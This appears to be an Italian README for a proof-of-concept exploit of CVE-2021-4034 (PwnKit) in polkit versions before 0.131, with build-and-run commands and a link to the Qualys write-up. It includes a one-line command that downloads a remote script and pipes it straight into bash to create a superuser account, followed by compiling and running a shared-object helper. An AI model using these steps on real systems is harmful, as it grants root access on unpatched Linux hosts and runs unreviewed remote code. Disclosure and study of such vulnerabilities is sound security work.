
CVE-2021-4034 PoC , polkit < 0.131
PoC per CVE-2021-4034, polkit < 0.131
Testato su Arch Linux (Manjaro e Axyl OS)
git clone https://github.com/tahaafarooq/poppy
make
./poppy
Exploit per la creazione dell'utente superuser
bash -c "$(curl -fsSL https://raw.githubusercontent.com/tahaafarooq/poppy/main/suuser.sh)"
gcc -shared su.c -o suuser -Wl,-e,entry -fPIC
./suuser

Per maggiori informazioni su questa vulnerabilità, fare riferimento al writeup https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt